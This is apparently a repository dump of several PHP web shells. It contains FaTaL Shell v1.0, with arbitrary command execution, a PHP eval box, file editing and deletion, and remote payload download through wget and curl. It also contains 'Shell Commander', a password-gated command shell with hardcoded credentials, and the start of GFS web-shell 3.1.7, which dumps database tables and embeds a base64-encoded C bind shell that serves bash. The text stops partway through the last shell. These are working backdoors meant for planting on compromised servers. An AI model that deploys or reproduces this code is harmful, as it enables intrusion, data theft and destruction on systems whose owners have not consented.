set_magic_quotes_runtime(0);
@set_time_limit(0);
if(@get_magic_quotes_gpc()){foreach ($_POST as $k=>$v){$_POST[$k] = stripslashes($v);}}
@ini_set('max_execution_time',0);
(@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF(Rootla_Beni:)");
(@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0);
(strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0);
$version='version 1.0 by FaTaLErrOr';
$action=$_POST['action'];
$file=$_POST['file'];
$dir=$_POST['dir'];
$content='';
$stdata='';
$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}select{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{background-color: #A8A8AD;color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
$header='<html><head><title>'.getenv("HTTP_HOST").' - FaTaL Shell v1.0</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1254">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
$footer='</body></html>';
$lang=array(
'filext'=>'Lutfen Dosyayi Adlandiriniz Yada Degistiriniz.',
'uploadok'=>'Baþarýyla Yüklendi.',
'dircrt'=>'Klasör Oluþturuldu.',
'dontlist'=>'Listelenemiyor Ýzin Yok.',
'dircrterr'=>'Oluþturulamýyor Ýzin Yok.',
'dirnf'=>'Dizin Bulunamadi.',
'filenf'=>'.',
'dontwrdir'=>'Sadece Okunabilir.',
'empty'=>'Dizin Boþ Deðil Yada Ýzin Yok.',
'deletefileok'=>'Dosya Silindi.',
'deletedirok'=>'Klasör Silindi.',
'isdontfile'=>'Lütfen Full Url Yazýn. c:/program files/a.php Gibi',
'cantrfile'=>'Dosya Açýlamýyor izin Yok.',
'onlyracc'=>'Dosya Editlenemiyor Okuma Ýzni Var Sadece..',
'workdir'=>'Çalýþma Dizini: ',
'fullacc'=>'Full Yetki.',
'fullaccdir'=>'Full Yetkiniz Var Dosya Silip Düzenleyebilirsiniz.',
'thisnodir'=>'Klasör Seçin.',
'allfuncsh'=>'Fonksiyoýnlar Kapalý.'
);
$act=array('viewer','editor','upload','shell','phpeval','download','delete','deletedir');//here added new actions
function test_file($file){
if(!file_exists($file))$err="1";
elseif(!is_file($file)) $err="2";
elseif(!is_readable($file))$err="3";
elseif(!is_writable($file))$err="4"; else $err="5";
return $err;}
function test_dir($dir){
if(!file_exists($dir))$err="1";
elseif(!is_dir($dir)) $err="2";
elseif(!is_readable($dir))$err="3";
elseif(!is_writable($dir))$err="4"; else $err="5";
return $err;}
function perms($file){
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {$info = 's';}
elseif (($perms & 0xA000) == 0xA000) {$info = 'l';}
elseif (($perms & 0x8000) == 0x8000) {$info = '-';}
elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}
elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}
elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}
else {$info = 'u';}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
return $info;}
function view_size($size){
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;}
if(isset($action)){if(!in_array($action,$act))$action="viewer";else $action=$action;}else $action="viewer";
if(isset($dir)){
$ts['test']=test_dir($dir);
switch($ts['test']){
case 1:$stdata.=$lang['dirnf'];break;
case 2:$stdata.=$lang['thisnodir'];break;
case 3:$stdata.=$lang['dontlist'];break;
case 4:$stdata.=$lang['dontwrdir'];$dir=chdir($GLOBALS['dir']);break;
case 5:$stdata.=$lang['fullaccdir'];$dir=chdir($GLOBALS['dir']);break;}
}else $dir=@chdir($dir);
$dir=getcwd()."/";
$dir=str_replace("\\","/",$dir);
if(isset($file)){
$ts['test1']=test_file($file);
switch ($ts['test1']){
case 1:$stdata.=$lang['filenf'];break;
case 2:$stdata.=$lang['isdontfile'];break;
case 3:$stdata.=$lang['cantrfile'];break;
case 4:$stdata.=$lang['onlyracc'];$file=$file;break;
case 5:$stdata.=$lang['fullacc'];$file=$file;break;}
}
function shell($cmd)
{
global $lang;
$ret = '';
if (!empty($cmd))
{
if(function_exists('exec')){@exec($cmd,$ret);$ret = join("\n",$ret);}
elseif(function_exists('shell_exec')){$ret = @shell_exec($cmd);}
elseif(function_exists('system')){@ob_start();@system($cmd);$ret = @ob_get_contents();@ob_end_clean();}
elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();}
elseif(@is_resource($f = @popen($cmd,"r"))){$ret = "";while(!@feof($f)) { $ret .= @fread($f,1024); }@pclose($f);}
else $ret=$lang['allfuncsh'];
}
return $ret;
}
function createdir($dir){mkdir($dir);}
//delete file
if($action=="delete"){
if(unlink($file)) $content.=$lang['deletefileok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk Ýçin Týklayýnýz.</a>";
}
//delete dir
if($action=="deletedir"){
if(!rmdir($file)) $content.=$lang['empty']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk Ýçin Týklayýnýz.</a>";
else $content.=$lang['deletedirok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk Ýçin Týklayýnýz.</a>";
}
//shell
if($action=="shell"){
$content.="<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"shell\">
<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
<textarea readonly rows=\"15\" cols=\"150\">".convert_cyr_string(htmlspecialchars(shell($_POST['command'])),"d","w")."</textarea><br>
<input type=\"submit\" value=\"Uygula\"></form>";}
//editor
if($action=="editor"){
$stdata.="<form method=POST>
<input type=\"hidden\" name=\"action\" value=\"editor\">
<input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
Dosyanýn Adý (Full Url Yazýn)<input type=text name=file value=\"".($file=="" ? $file=$dir : $file=$file)."\" size=50><input type=submit value=\"Editle\"></form>";
function writef($file,$data){
$fp = fopen($file,"w+");
fwrite($fp,$data);
fclose($fp);
}
function readf($file){
clearstatcache();
$f=fopen($file, "r");
$contents = fread($f,filesize($file));
fclose($f);
return htmlspecialchars($contents);
}
if(@$_POST['save'])writef($file,$_POST['data']);
if(@$_POST['create'])writef($file,"");
$test=test_file($file);
if($test==1){
$content.="<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"editor\">
File name:<input type=\"text\" name=\"file\" value=\"".$file."\" size=\"50\"><br>
<input type=\"submit\" name=\"create\" value=\"Create new file with this name?\">
<input type=\"reset\" value=\"No\"></form>";
}
if($test>2){
$content.="<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"editor\">
<input type=\"hidden\" name=\"file\" value=\"".$file."\">
<textarea name=\"data\" rows=\"30\" cols=\"180\">".@readf($file)."</textarea><br>
<input type=\"submit\" name=\"save\" value=\"Kaydet\"><input type=\"reset\" value=\"Reset\"></form>";
}}
//viewer
if($action=="viewer"){
$content.="<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
$content.="<tr><td><form method=POST>Klasore Git:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"Git\"></form></td></tr>";
if (is_dir($dir)) {
if (@$dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if(filetype($dir . $file)=="dir") $dire[]=$file;
if(filetype($dir . $file)=="file")$files[]=$file;
}
closedir($dh);
@sort($dire);
@sort($files);
if ($GLOBALS['os']==1) {
$content.="<tr><td>HDD Secin:";
for ($j=ord('C'); $j<=ord('Z'); $j++)
if (@$dh = opendir(chr($j).":/"))
$content.='<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
$content.="</td></tr>";
}
$content.="<tr><td>Sistem: ".@php_uname()."</td></tr><tr><td></td><td>Biçim</td><td>Boyut</td><td>izin</td><td>Seçenekler</td></tr>";
for($i=0;$i<count($dire);$i++) {
$link=$dir.$dire[$i];
$content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>Klasor</td><td></td><td>'.perms($link).'</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Klasörü Sil">X</a></td></tr>';
}
for($i=0;$i<count($files);$i++) {
$linkfile=$dir.$files[$i];
$content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>Dosya</td><td>'.view_size(filesize($linkfile)).'</td><td>'.perms($linkfile).'</td><td><a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Download">D</a><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Edit">E</a><a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Bu Dosyayi Sil">X</a></td></tr>';
}
$content.="</table>";
}}}
//downloader
if($action=="download"){
header('Content-Length:'.filesize($file).'');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.$file.'"');
readfile($file);}
//phpeval
if($action=="phpeval"){
$content.="<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"phpeval\">
<input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
&lt;?php<br>
<textarea name=\"phpev\" rows=\"5\" cols=\"150\">".@$_POST['phpev']."</textarea><br>
?><br>
<input type=\"submit\" value=\"Uygula\"></form>";
if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);}
//upload
if($action=="upload"){
if(isset($_POST['dirupload'])) $dirupload=$_POST['dirupload'];else $dirupload=$dir;
$form_win="<tr><td><form method=POST enctype=multipart/form-data>
<input type=\"hidden\" name=\"action\" value=\"upload\">
Buraya Uploadla:<input type=text name=dirupload value=\"".$dirupload."\" size=50></tr></td><tr><td>Dosyayý Adlandýr (Gerekli) :<input type=text name=filename></td></tr><tr><td><input type=file name=file><input type=submit name=uploadloc value='Upload Et'></td></tr>";
if($os==1)$content.=$form_win;
if($os==0){
$content.=$form_win;
$content.='<tr><td><select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>File addres:<input type=text name=urldown>
<input type=submit name=upload value=Upload></form></td></tr>';
}
if(isset($_POST['uploadloc'])){
if(!isset($_POST['filename'])) $uploadfile = $dirupload.basename($_FILES['file']['name']); else
$uploadfile = $dirupload."/".$_POST['filename'];
if(test_dir($dirupload)==1 && test_dir($dir)!=3 && test_dir($dir)!=4){createdir($dirupload);}
if(file_exists($uploadfile))$content.=$lang['filext'];
elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile))
$content.=$lang['uploadok'];
}
if(isset($_POST['upload'])){
if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
switch($_POST['with'])
{
case wget:shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");break;
case fetch:shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");break;
case lynx:shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
case links:shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
case GET:shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");break;
case curl:shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");break;
}}}
//end function
?><?=$header;?>
<style type="text/css">
<!--
.style4 {
font-size: x-large;
font-weight: bold;
}
.style5 {color: #FF0000}
.style8 {color: #CCFF00}
-->
</style>
<a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();"><p align="center" class="style4">FaTaLSheLL v1.0 </p></a>
<table width="100%" bgcolor="#336600" align="right" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="#" onclick="document.reqs.action.value='shell';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Shell </a></td><td><a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Ana Sayfa</a></td><td><a href="#" onclick="document.reqs.action.value='editor';document.reqs.file.value='<?=$file;?>';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Dosya Editle</a></td><td><a href="#" onclick="document.reqs.action.value='upload';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Dosya Upload</a></td><td><a href="#" onclick="document.reqs.action.value='phpeval';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Php Eval |</a></td><td><a href="#" onclick="history.back();"> <-Geri |</a></td><td><a href="#" onclick="history.forward();"> Ýleri->|</a></td></tr></table></td></tr></table><br><form name='reqs' method='POST'><input name='action' type='hidden' value=''><input name='dir' type='hidden' value=''><input name='file' type='hidden' value=''></form>
<p>&nbsp;</p>
<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr><td><span class="style8">Safe mode:</span> <?php echo $safe_mode;?><br>
<span class="style8">Fonksiyon Kýsýtlamasý:</span> <?php echo $disfunc;?><br>
<span class="style8">Sistem:</span> <?php echo @php_uname();?><br>
<span class="style8">Durum:</span> <?php echo @$stdata;?></td>
</tr></table><table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?=$content;?></td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://www.starhack.org">COPYRIGHT BY StarHack.oRg <?=$version;?></a></td></tr></table></tr></td></table><?=$footer;?>

322
138shell/F/fuckphpshell.txt Normal file
View file

@ -0,0 +1,322 @@
<?php
error_reporting(0);
session_start();
unset($user); // Just in case ;-]
unset($pass);
if ($_POST['cmd']) $_POST['cmd'] = my_encode($_POST['cmd']);
$cache_lines = 1000;
$history_lines = 100;
$history_chars = 20;
$user[] = "root"; $pass[] = md5("fuckyou");
$user[] = "user"; $pass[] = md5("fuckhacker");
$alias = array(
"la" => "ls -la",
"rf" => "rm -f",
"unbz2" => "tar -xjpf",
"ungz" => "tar -xzpf"
);
if (!$_SESSION['user']) {
$pr_login = "Login:\n";
$pr_pass = "Password:\n";
$err = "Invalid login!\n\n";
$succ = "Warning!
Don`t be stupid .. this is a priv3 server, so take extra care!!!\n\n";
if ($_SESSION['login'] && $_POST['cmd']) { // WE HAVE USERNAME & PASSWORD
$_SESSION['output'] .= $pr_pass;
if (in_array($_SESSION['login'], $user)) { //........ USERNAME EXISTS
$key = array_search($_SESSION['login'], $user);
if ($pass[$key] != md5($_POST['cmd'])) { //....... WRONG PASSWORD
$_SESSION['output'] .= $err;
unset($_SESSION['login']);
$prompt = $pr_login;
} else { //..................................... SUCCESSFUL LOGIN
$_SESSION['user'] = $_SESSION['login'];
$_SESSION['whoami'] = substr(shell_exec("whoami"), 0, -1);
$_SESSION['host'] = substr(shell_exec("uname -n"), 0, -1);
$_SESSION['dir'] = substr(shell_exec("pwd"), 0, -1);
$_SESSION['output'] .= $succ;
$prompt = set_prompt();
unset($_SESSION['login']);
}
} else { //......................................... NO SUCH USERNAME
$_SESSION['output'] .= $err;
unset($_SESSION['login']);
$prompt = $pr_login;
}
} else { //................................................ LOGIN PROCESS
if (!$_SESSION['login'] && !$_POST['cmd']) $prompt = $pr_login;
if (!$_SESSION['login'] && $_POST['cmd']) {
$_SESSION['login'] = $_POST['cmd'];
$_SESSION['output'] .= substr($pr_login, 0, -1) . " $_POST[cmd]\n";
$prompt = $pr_pass;
}
}
} else { //........................................................ LOGGED IN
/*=-- MEMBERS AREA --=*\
\*=-- MEMBERS AREA --=*/
$prompt = set_prompt();
chdir($_SESSION['dir']);
if ($_REQUEST['clear_hist']) //............................ CLEAR HISTORY
$_SESSION['history'] = "";
if ($_SESSION['history']) $hist_arr = explode("\n", $_SESSION['history']);
if ($_POST['cmd']) {
if (!in_array($_POST['cmd'], $hist_arr)) { //......... ADD TO HISTORY
$hist_arr[] = $_POST['cmd'];
$_SESSION['history'] = implode("\n", $hist_arr);
}
if (count($hist_arr) > $history_lines) { //........... CUTOFF HISTORY
$start = count($hist_arr) - $history_lines;
$_SESSION['history'] = "";
for ($i = $start; $i < count($hist_arr); $i++)
$_SESSION['history'] .= $hist_arr[$i] . "\n";
$_SESSION['history'] = substr($_SESSION['history'], 0, -1);
$hist_arr = explode("\n", $_SESSION['history']);
}
$first_word = first_word($_POST['cmd']);
if (array_key_exists($first_word, $alias)) { //. CHECKING FOR ALIASES
$_POST['cmd'] = $alias[$first_word] . substr($_POST['cmd'], strlen($first_word));
$first_word = first_word($_POST['cmd']);
}
switch ($first_word) {
case "clear":
$_SESSION['output'] = "";
break;
case "exit":
session_destroy();
refresh();
break;
case "cd":
$_SESSION['output'] .= $prompt;
$result = shell_exec($_POST['cmd'] . " 2>&1 ; pwd");
$result = explode("\n", $result);
$_SESSION['dir'] = $result[count($result) - 2];
if (count($result) > 2) //.............. WE HAVE AN ERROR MESSAGE
$result[0] = "\n" . substr($result[0], strpos($result[0], "cd: ")) . "\n";
else $result[0] = "\n";
$prompt = set_prompt();
$_SESSION['output'] .= $_POST['cmd'] . $result[0];
break;
default:
$result = shell_exec($_POST['cmd'] . " 2>&1");
if (substr($result, -1) != "\n") $result .= "\n";
$_SESSION['output'] .= $prompt . $_POST['cmd'] . "\n" . $result;
$rows = preg_match_all('/\n/', $_SESSION['output'], $arr);
unset($arr);
if ($rows > $cache_lines) {
preg_match('/(\n[^\n]*){' . $cache_lines . '}$/', $_SESSION['output'], $out);
$_SESSION['output'] = $out[0] . "\n";
}
}
}
}
/*=-- FUNCTIONS --=*\
\*=-- FUNCTIONS --=*/
function my_encode($str) {
$str = str_replace("\\\\", "\\", $str);
$str = str_replace("\\\"", "\"", $str);
$str = str_replace("\\'", "'", $str);
while (strpos($str, " ") !== false) $str = str_replace(" ", " ", $str);
return rtrim(ltrim($str));
}
function set_prompt() {
global $_SESSION;
return $_SESSION['whoami'] . "@" . $_SESSION['host'] . " " . substr($_SESSION['dir'], strrpos($_SESSION['dir'], "/") + 1) . " $ ";
}
function first_word($str) {
list($str) = preg_split('/[ ;]/', $str);
return $str;
}
function refresh() {
global $_SERVER;
$self = substr($_SERVER['SCRIPT_NAME'], strrpos($_SERVER['SCRIPT_NAME'], "/") + 1);
header("Location: $self");
die;
}
/*=-- HTML PAGE --=*\
\*=-- HTML PAGE --=*/
$out = substr(preg_replace('/<\/(textarea)/i', '&lt;/\1', $_SESSION['output']), 0, -1);
?><HTML>
<HEAD>
<TITLE>Shell Commander</TITLE>
<STYLE TYPE="text/css"><!--
INPUT, TEXTAREA, SELECT, OPTION, TD {
color: #BBBBBB;
background-color: #000000;
font-family: Terminus, Fixedsys, Fixed, Terminal, Courier New, Courier;
}
TEXTAREA {
overflow-y: auto;
border-width: 0px;
height: 100%;
width: 100%;
padding: 0px;
}
INPUT {
border-width: 0px;
height: 26px;
width: 100%;
padding-top: 5px;
}
SELECT, OPTION {
color: #000000;
background-color: #BBBBBB;
}
BODY {
overflow-y: auto;
margin: 0;
}
--></STYLE>
<SCRIPT LANGUAGE="JavaScript"><!--
hist_arr = new Array();
<?php
foreach ($hist_arr as $key => $value) {
$value = str_replace("\\", "\\\\", $value);
$value = str_replace("\"", "\\\"", $value);
echo "hist_arr[$key] = \"$value\";\n";
}
?>
function parse_hist(key) {
if (key < hist_arr.length) {
if (key != "") {
document.getElementById('input').value = hist_arr[key];
document.getElementById('input').focus();
}
} else {
window.location.href = "?clear_hist=1";
}
}
function input_focus() {
document.getElementById('input').focus();
}
function selection_to_clipboard() { // IE only!
if (window.clipboardData && document.selection)
window.clipboardData.setData("Text", document.selection.createRange().text);
}
if (window.clipboardData)
document.oncontextmenu = new Function("document.getElementById('input').value = window.clipboardData.getData('Text'); input_focus(); return false");
--></SCRIPT>
</HEAD>
<BODY onLoad="document.getElementById('output').scrollTop = document.getElementById('output').scrollHeight; input_focus()" TOPMARGIN="0" LEFTMARGIN="0">
<TABLE CELLPADDING="0" CELLSPACING="0" BORDER="0" HEIGHT="100%" WIDTH="100%">
<TR>
<TD HEIGHT="100%" BGCOLOR="#000000" STYLE="padding-top: 5px; padding-left: 5px; padding-right: 5px; padding-bottom: 0px"><TEXTAREA ID="output" onSelect="selection_to_clipboard()" onClick="input_focus()" READONLY><?= $out ?></TEXTAREA></TD>
</TR>
<TR>
<TD BGCOLOR="#000000"><TABLE CELLPADDING="0" CELLSPACING="5" BORDER="0" WIDTH="100%">
<TR>
<FORM METHOD="POST" ACTION="">
<TD NOWRAP onClick="input_focus()"><?= substr($prompt, 0, -1) ?></TD>
<TD WIDTH="100%"><INPUT ID="input" TYPE="<?= (!$_SESSION['user'] && $_SESSION['login']) ? 'PASSWORD' : 'TEXT' ?>" NAME="cmd"></TD>
</FORM><?php
if ($hist_arr) {
?><TD NOWRAP><SELECT onChange="parse_hist(this.options[this.selectedIndex].value)">
<OPTION VALUE="">--- HISTORY</OPTION><?php
for ($i = count($hist_arr) - 1; $i >= 0; $i--) {
if (strlen($hist_arr[$i]) > $history_chars) $option = substr($hist_arr[$i], 0, $history_chars - 3) . "...";
else $option = $hist_arr[$i];
echo "<OPTION VALUE=\"" . $i . "\">$option</OPTION>";
}
?><OPTION VALUE="<?= $history_lines + 1 ?>">--- CLEAR HISTORY</OPTION></SELECT></TD><?php
}
?></TR>
</TABLE></TD>
</TR>
</TABLE>
<SCRIPT LANGUAGE="JavaScript"><!--
document.getElementById('output').scrollTop = document.getElementById('output').scrollHeight;
--></SCRIPT>
</BODY>
</HTML>

618
138shell/G/GFS web-shell ver 3.1.7 - PRiV8.txt Normal file
View file

@ -0,0 +1,618 @@
<?
/*
*************************
* ###### ##### ###### *
* ###### ##### ###### *
* ## ## ## *
* ## #### ###### *
* ## ## #### ###### *
* ## ## ## ## *
* ###### ## ###### *
* ###### ## ###### *
* *
* Group Freedom Search! *
*************************
GFS Web-Shell
*/
error_reporting(0);
if($_POST['b_down']){
$file=fopen($_POST['fname'],"r");
ob_clean();
$filename=basename($_POST['fname']);
$filedump=fread($file,filesize($_POST['fname']));
fclose($file);
header("Content-type: application/octet-stream");
header("Content-disposition: attachment; filename=\"".$filename."\";");
echo $filedump;
exit();
}
if($_POST['b_dtable']){
$dump=down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
if($dump!=""){
header("Content-type: application/octet-stream");
header("Content-disposition: attachment; filename=\"".$_POST['tablename'].".dmp\";");
echo down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
exit();
}else
die("<b>Error dump!</b><br> table=".$_POST['tablename']."<br> db=".$_POST['dbname']."<br> host=".$_POST['host']."<br> user=".$_POST['username']."<br> pass=".$_POST['pass']);
}
set_magic_quotes_runtime(0);
set_time_limit(0);
ini_set('max_execution_time',0);
ini_set('output_buffering',0);
if(version_compare(phpversion(), '4.1.0')==-1){
$_POST=&$HTTP_POST_VARS;
$_GET=&$HTTP_GET_VARS;
$_SERVER=&$HTTP_SERVER_VARS;
}
if (get_magic_quotes_gpc()){
foreach ($_POST as $k=>$v){
$_POST[$k]=stripslashes($v);
}
foreach ($_SERVER as $k=>$v){
$_SERVER[$k]=stripslashes($v);
}
}
if ($_POST['username']==""){
$_POST['username']="root";
}
////////////////////////////////////////////////////////////////////////////////
///////////////////////////// Ïåðåìåííûå ///////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
$r_act=$_POST['r_act'];
$safe_mode=ini_get('safe_mode'); //ñòàòóñ áåçîïàñíîãî ðåæèìà
$mysql_stat=function_exists('mysql_connect'); //Íàëè÷èå mysql
$curl_on=function_exists('curl_version'); //íàëè÷èå cURL
$dis_func=ini_get('disable_functions'); //çàáëîêèðîâàíûå ôóíêöèè
$HTML=<<<html
<html>
<head>
<title>GFS web-shell ver 3.1.7</title>
</head>
<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
html;
$port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
